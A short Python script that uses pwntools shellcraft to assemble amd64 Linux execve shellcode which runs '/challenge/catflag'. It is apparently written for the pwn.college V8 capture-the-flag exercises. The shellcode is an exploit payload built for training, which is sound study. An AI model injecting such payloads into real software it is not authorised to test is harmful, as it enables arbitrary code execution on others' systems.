
from pwn import context, shellcraft
from common import *
# Select amd64/Linux as the pwntools global context. The shellcraft calls below
# name the amd64 templates explicitly; dump_machine_code comes from `common`
# (not shown here) and presumably assembles under this context -- confirm.
context(arch='amd64', os='linux')

# Training shellcode for the pwn.college V8 exercises: the equivalent of
#     execve("/challenge/catflag", argv, envp)
# where argv and envp each point at a single NULL stack slot, i.e. they are
# empty, NULL-terminated arrays rather than NULL pointers.
#
# Each register is loaded from rsp immediately after its push. Later pushes
# only move rsp further down, so the slots rdx and rsi refer to stay intact.
#
# NOTE(review): argv is empty, so the target starts without an argv[0]. Newer
# Linux kernels warn about an empty argv and substitute an empty string;
# confirm that /challenge/catflag does not depend on argv[0].
assembly = "\n".join((
    "/* Craft envp to rdx */",
    shellcraft.amd64.push(0),
    shellcraft.amd64.mov("rdx", "rsp"),
    "/* Craft argv to rsi */",
    shellcraft.amd64.push(0),
    shellcraft.amd64.mov("rsi", "rsp"),
    "/* Craft pathname to rdi */",
    shellcraft.amd64.pushstr("/challenge/catflag"),
    shellcraft.amd64.mov("rdi", "rsp"),
    "/* syscall execve */",
    shellcraft.amd64.linux.syscall("SYS_execve", "rdi", "rsi", "rdx"),
)).strip()

# Hand the assembled listing to the project helper that emits machine code.
dump_machine_code(assembly)